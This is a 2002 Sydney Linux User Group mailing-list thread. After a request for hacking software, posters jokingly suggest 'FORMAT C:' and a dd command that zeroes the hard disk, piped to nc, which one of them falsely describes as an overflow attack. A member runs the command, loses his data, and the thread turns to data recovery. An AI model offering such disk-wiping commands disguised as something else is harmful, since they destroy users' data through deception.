No good. You don't have a file system!
You need some of the techniques described
here in this classic paper:
http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html
I suspect that recreating the data is far cheaper.
Booth, Christopher (Aus) - ATP wrote:
> www.r-tt.com
>
> Has R-linux to recover from EXT2 file systems and EXT3 which is based on
> EXT2
>
> Strangely though it runs on Windows
>
> Chris
>
> -----Original Message-----
> From: Booth, Christopher (Aus) - ATP
> Sent: Friday, 19 April 2002 12:51 PM
> To: 'Matthew Hannigan'; Booth, Christopher (Aus) - ATP
> Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
> Subject: RE: [SLUG] i need a sofware to penetrate in to systems
>
>
> I'm definitely not trolling
>
> I'll get my data back some how I'll leave no stone unturned, but seriously
> if people are going to put commands that can potentially ruin a newbie or
> gullible person's data, at least make it 100% clear that it is a joke and/or
> provide a warning of it's consequences. I enjoy a joke as much as the next
> person.
>
> I'll only be at this company for another 2 weeks, so I don't care about the
> OS and stuff. My personal data which I was just about to back up and write
> to CD is going to be hard to replace.
>
> Chris
>
>
>
>
>
>
> -----Original Message-----
> From: Matthew Hannigan [mailto:[EMAIL PROTECTED]]
> Sent: Friday, 19 April 2002 12:28 PM
> To: Booth, Christopher (Aus) - ATP
> Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
>
>
> I really hope you're not trolling too.,
>
> If not, your data is probably not recoverable.
>
> Theoritically it may be; but it would cost thousands
> and thousands to do so. Do a search for "data recovery"
> on google. One good one seems to be http://www.ibas.com/
>
>
> Booth, Christopher (Aus) - ATP wrote:
>
>>Ay Caramba
>>
>>Does this do what I think it does and is equivalent to format c: in dos ?
>>
>>There should have been some warning to this, as not everyone is familiar
>>with the dd command (including me)
>>
>>I stupidly as a joke tried this, thinking that the nc command would
>
> actually
>
>>do what was thought.
>>
>>Please remember that there are newbies and stubies here
>>
>>I've no idea if what I've done is fixable, but I'm not happy if I've lost
>>all my data on my hard drive.
>>I don't care about programs but my personal stuff is hard to replace.
>>
>>While it may be fun to take the mickey out of Osama, if you lost all your
>>personal data, and didn't have a backup mechanism available to restore it
>>from, would you be happy ?
>>
>>Disappointedly
>>
>>Chris
>>-----Original Message-----
>>From: Daniel Stone [mailto:[EMAIL PROTECTED]]
>>Sent: Wednesday, 17 April 2002 8:19 PM
>>To: Matthew Sanderson
>>Cc: OSAMA; [EMAIL PROTECTED]
>>Subject: Re: [SLUG] i need a sofware to penetrate in to systems
>>
>>
>>On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
>>
>>
>>>OSAMA,
>>>
>>>Try this command from a DOS prompt, it accesses the CIA and FBI's websites
>>>and lets you access the restricted area:
>>>
>>>FORMAT C:
>>
>>
>>But seriously, I suggest:
>>dd if=/dev/zero of=/dev/hda bs=1k | nc <host here> 65535
>>
>>This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
>>because that's near an overflow region!
>>
>>Have fun!
>>d
>>
>
>
>
> ---
> Incoming mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>
>
> ---
> Incoming mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
>
--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug